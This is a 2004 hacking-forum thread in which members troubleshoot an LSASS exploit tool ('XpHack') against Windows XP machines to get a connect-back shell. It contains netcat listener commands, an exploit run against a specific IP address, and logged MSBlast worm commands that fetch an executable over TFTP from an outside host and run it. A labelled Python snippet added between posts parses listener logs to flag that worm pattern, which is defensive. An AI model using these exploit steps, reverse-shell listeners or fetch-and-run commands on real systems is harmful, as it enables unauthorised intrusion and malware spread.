Forums: Xp Hack Lsass - Forums

Xp Hack LSASS

#1 EXPLOiTED

  • Sergeant
  • Group: Members
  • Posts: 236
  • Joined: 23-October 03

Posted 17 May 2004 - 07:15 PM

Problem: I read the previous thread on this. I get this when I try (if it even works):

[10:07:31pm] [MERKiN] listening on [any] 4444 ...
[10:07:31pm] [MERKiN] connect to [xxx] from xxx.xxx.xxx.xxx [12.75.84.76] 3433
[10:07:31pm] [MERKiN] tftp -i 12.75.84.76 GET msblast.exe
[10:07:31pm] [MERKiN] start msblast.exe
[10:07:31pm] [MERKiN] msblast.exe

Then it goes back to my CMD line. That was the older XPHack.exe, compiled straight from the site. Now I understand that someone (forget the name, sorry to whomever you are) compiled a new one. Ok cool, downloaded it, nothing. With my netcat it's not letting me type in 0 victim port ip.

My nc.cmd is [ nc.exe -l -v -p 65000 ] and that's it. I have used the first exploit of this nature, and uh... worked. Just ran lsass.exe offset victim port connect back, and had a netcat window open as well... Any insight on this? I'm stumped.
0

#2 Anarchiste

  • Private First Class
  • Group: Members
  • Posts: 95
  • Joined: 25-February 04

Posted 18 May 2004 - 01:49 AM

Your netcat listens on port 4444, and you wait for a connect-back shell. But the MSBlast worm scans ranges for port 4444 open to infect them, because an infected box has a shell on this port. So run the test: just listen on that port for one night and you will see many MSBlast connections. The XPHACK lsass exploit works, and returns a shell.
So have a nice hack :lol:
0
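
Added example (not part of any post in this thread, and not code from any tool named here): a small Python parser that reads the output of a listener on port 4444 and flags sessions where the peer sends the fetch-then-run command sequence seen in post #1, which is the signature of worm traffic rather than an interactive shell. The function name, field names and sample addresses are assumptions; the sample transcript is constructed with documentation address ranges.

```python
import re

# netcat -v banner for an accepted connection: "connect to [local] from host [peer] port"
CONNECT_RE = re.compile(
    r"connect to \[(?P<local>[^\]]+)\] from \S+ \[(?P<peer>[^\]]+)\] (?P<port>\d+)")
# First command the worm sends to the shell it expects to find on port 4444
TFTP_RE = re.compile(r"^tftp\s+-i\s+(?P<host>\S+)\s+GET\s+(?P<file>\S+)\s*$", re.I)
# Optional "[time] [nick] " prefixes added by a chat or log wrapper
PREFIX_RE = re.compile(r"^(\[[^\]]*\]\s*)+")


def find_worm_sessions(lines):
    """Group listener output into sessions and flag fetch-then-run command pairs."""
    sessions, current = [], None
    for raw in lines:
        line = PREFIX_RE.sub("", raw.strip())
        m = CONNECT_RE.search(line)
        if m:
            current = {"peer": m["peer"], "src_port": int(m["port"]),
                       "tftp_host": None, "payload": None, "executed": False}
            sessions.append(current)
            continue
        if current is None or not line:
            continue
        t = TFTP_RE.match(line)
        if t:
            current["tftp_host"], current["payload"] = t["host"], t["file"]
        elif current["payload"] and line.lower() in (
                current["payload"].lower(), "start " + current["payload"].lower()):
            current["executed"] = True
    # Worm-like only if the peer both fetched a file and then tried to run it
    return [s for s in sessions if s["payload"] and s["executed"]]


# Constructed sample (documentation address ranges), shaped like the output in post #1
SAMPLE = """\
listening on [any] 4444 ...
connect to [192.0.2.10] from host-a.example [198.51.100.23] 3433
tftp -i 198.51.100.23 GET msblast.exe
start msblast.exe
msblast.exe
connect to [192.0.2.10] from host-b.example [203.0.113.5] 1188
dir
""".splitlines()

if __name__ == "__main__":
    for s in find_worm_sessions(SAMPLE):
        print(f"{s['peer']}:{s['src_port']} pushed {s['payload']} via TFTP from {s['tftp_host']}")
```
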

#3 EXPLOiTED

  • Sergeant
  • Group: Members
  • Posts: 236
  • Joined: 23-October 03

Posted 19 May 2004 - 03:42 PM

Look at this...


C:\RPC3>xp 128.210.124.155 4444

-----XpHack 1.0 beta-----
-----ExPlOiT CoDeD By: JoCaNoR-----

Connecting...Good
Getting a shell...OoOoOps shell!!
C:\RPC3>nc.exe -l -v -p 4444
listening on [any] 4444 ...
connect to [12.x.x.x] from xxx.xxx.xxx.xxx [12.x.x.x] 3892
tftp -i 12.75.78.56 GET msblast.exe
start msblast.exe
msblast.exe
C:\RPC3>

Thing is... the 'to' IP is not right at all. It turns out it's an IP in my network... Shall I use another port? This won't stop happening, I know port 4444 is used by msblast.exe.

Thx again

EXPLOiTED
0

#4 Flowby

  • Sergeant
  • Group: Members
  • Posts: 205
  • Joined: 06-September 03

Posted 19 May 2004 - 06:09 PM

Lol, that happened to me too.....
Strange, a lot of us use 4444 he he ;)
Strange this blaster is still out, man?
0

#5 EXPLOiTED

  • Sergeant
  • Group: Members
  • Posts: 236
  • Joined: 23-October 03

Posted 19 May 2004 - 08:07 PM

Well, the thing is, nothing is actually downloaded. It looks fake in my opinion. It "downloads" from a person in your range. So dismiss the msblaster worm download, for it is never downloaded. I'm just trying to find out why I cannot gain shell. Using the 2000 exploit, I can do it. If there were an "XpHack2.exe" that would have the same format as lsasser.exe, which was

lsasstest.exe offset <target> bindport <your ip>

and have NC running on, oh, say port 65000, it would work... If I can be of any help, drop me a line.


EXPLOiT
0
